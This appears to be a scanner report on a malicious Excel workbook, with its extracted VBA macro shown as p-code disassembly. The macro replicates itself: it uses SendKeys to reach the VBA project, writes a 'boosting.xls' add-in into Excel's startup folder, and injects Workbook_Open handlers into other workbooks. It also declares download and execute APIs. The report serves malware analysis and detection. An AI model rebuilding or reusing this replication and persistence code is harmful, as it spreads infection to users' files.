MALICIOUS
102
Risk Score
Heuristics 3
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
VBA project contains no executable statements info OLE_VBA_MACROSDocument contains a VBA project, but extracted modules only contain attributes/options/comments and no executable statements.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11595 bytes |
SHA-256: 670a855c140da7b09052436b0f7742dae226dfe7b988230cbe7b5cbe65d1aef5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/6b60c3f2213c4fb484261a05a3c8e666.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 6592 bytes
' Line #0:
' FuncDefn (Private Declare Function URLDownloadToFile Lib "urlmon" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long)
' Line #1:
' FuncDefn (Private Declare Function ShellExecute Lib "shell32.dll" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long)
' Line #2:
' Dim (Private)
' VarDefn (WithEvents) app (As Application) 0x0000
' Line #3:
' Line #4:
' FuncDefn (Private Sub p2dd())
' Line #5:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayAlerts
' Line #6:
' OnError (Resume Next)
' Line #7:
' Debug
' PrintObj
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' PrintItemNL
' Line #8:
' Ld Err
' MemLd Number
' LitDI2 0x03EC
' Eq
' IfBlock
' Line #9:
' Ld Err
' ArgsMemCall Clear 0x0000
' Line #10:
' LitStr 0x0010 "%(qtmstv){ENTER}"
' Ld Application
' ArgsMemCall SendKeys 0x0001
' Line #11:
' ArgsCall DoEvents 0x0000
' Line #12:
' EndIfBlock
' Line #13:
' Ld ActiveWorkbook
' MemLd FileFormat
' LitDI2 0x0034
' Eq
' Ld ActiveWorkbook
' MemLd FileFormat
' LitDI2 0x0038
' Eq
' Or
' IfBlock
' Line #14:
' LitStr 0x0006 "update"
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x000A
' LitDI2 0x0001
' LitVarSpecial (False)
' LitVarSpecial (False)
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Find 0x0007
' LitVarSpecial (True)
' Eq
' LitStr 0x000B "OfficeCheck"
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x000A
' LitDI2 0x0001
' LitVarSpecial (False)
' LitVarSpecial (False)
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Find 0x0007
' LitVarSpecial (True)
' Eq
' Or
' IfBlock
' Line #15:
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' St k
' Line #16:
' LitDI2 0x0001
' Ld k
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #17:
' EndIfBlock
' Line #18:
' Dim
' VarDefn WBstr
' VarDefn Wb (As Workbook)
' Line #19:
' StartWithExpr
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #20:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0064
' For
' QuoteRem 0x0019 0x000D ".CountOfLines"
' Line #21:
' Ld WBstr
' Ld i
' LitDI2 0x0001
' ArgsMemLdWith Lines 0x0002
' Concat
' LitDI2 0x000A
' ArgsLd Chr 0x0001
' Concat
' St WBstr
' Line #22:
' StartForVariable
' Next
' Line #23:
' EndWith
' Line #24:
' Line #25:
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0000
' Eq
' IfBlock
' Line #26:
' LitDI2 0x0001
' Ld WBstr
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #27:
' LitDI2 0x0096
' LitStr 0x0013 "Sub Workbook_Open()"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #28:
' LitDI2 0x0097
' LitStr 0x0008 "Call d2p"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #29:
' LitDI2 0x0098
' LitStr 0x000D "Call boosting"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #30:
' LitDI2 0x0099
' LitStr 0x0007 "End Sub"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #31:
' EndIfBlock
' Line #32:
' EndIfBlock
' Line #33:
' EndSub
' Line #34:
' Line #35:
' FuncDefn (Private Sub d2p())
' Line #36:
' Dim
' VarDefn pth (As String)
' Line #37:
' Dim
' VarDefn WBstr
' VarDefn Wb (As Workbook)
' Line #38:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayAlerts
' Line #39:
' OnError (Resume Next)
' Line #40:
' Ld Application
' MemLd StartupPath
' LitStr 0x000D "\boosting.xls"
' Concat
' St pth1
' Line #41:
' Debug
' PrintObj
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' PrintItemNL
' Line #42:
' Ld Err
' MemLd Number
' LitDI2 0x03EC
' Eq
' IfBlock
' Line #43:
' Ld Err
' ArgsMemCall Clear 0x0000
' Line #44:
' LitStr 0x0010 "%(qtmstv){ENTER}"
' Ld Application
' ArgsMemCall SendKeys 0x0001
' Line #45:
' ArgsCall DoEvents 0x0000
' Line #46:
' EndIfBlock
' Line #47:
' Ld pth1
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Eq
' IfBlock
' Line #48:
' Debug
' PrintObj
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' PrintItemNL
' Line #49:
' Ld Err
' MemLd Number
' LitDI2 0x03EC
' Ne
' IfBlock
' Line #50:
' Ld pth1
' ParamNamed Filename
' LitDI2 0x0012
' ParamNamed FileFormat
' Ld Workbooks
' MemLd Add
' ArgsMemCall SaveAs 0x0002
' Line #51:
' QuoteRem 0x0000 0x0004 "Else"
' Line #52:
' QuoteRem 0x0004 0x000F "Workbooks.Close"
' Line #53:
' EndIfBlock
' Line #54:
' SetStmt
' Ld pth1
' Ld Workbooks
' ArgsMemLd Open 0x0001
' Set Wb
' Line #55:
' StartWithExpr
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #56:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0064
' For
' QuoteRem 0x0019 0x0011 ".CountOfLines 100"
' Line #57:
' Ld WBstr
' Ld i
' LitDI2 0x0001
' ArgsMemLdWith Lines 0x0002
' Concat
' LitDI2 0x000A
' ArgsLd Chr 0x0001
' Concat
' St WBstr
' Line #58:
' StartForVariable
' Next
' Line #59:
' EndWith
' Line #60:
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0000
' Eq
' Ld ActiveWorkbook
' MemLd Name
' LitStr 0x000C "boosting.xls"
' Eq
' And
' IfBlock
' Line #61:
' LitDI2 0x0001
' Ld WBstr
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #62:
' LitDI2 0x0096
' LitStr 0x0013 "Sub Workbook_Open()"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #63:
' LitDI2 0x0097
' LitStr 0x0015 "Set App = Application"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #64:
' LitDI2 0x0098
' LitStr 0x0007 "End Sub"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #65:
' LitDI2 0x0099
' LitStr 0x0032 "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #66:
' LitDI2 0x009A
' LitStr 0x000D "Call runtimer"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #67:
' LitDI2 0x009B
' LitStr 0x000D "Call boosting"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #68:
' LitDI2 0x009C
' LitStr 0x0007 "End Sub"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #69:
' EndIfBlock
' Line #70:
' LitVarSpecial (True)
' Ld ActiveWorkbook
' MemSt IsAddin
' Line #71:
' Ld Wb
' ArgsMemCall Save 0x0000
' Line #72:
' Ld Wb
' ArgsMemCall Close 0x0000
' Line #73:
' EndIfBlock
' Line #74:
' Ld pth1
' Paren
' Ld Workbooks
' ArgsMemCall Open 0x0001
' Line #75:
' EndSub
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet4 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet5 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet6 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet7 - 985 bytes
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.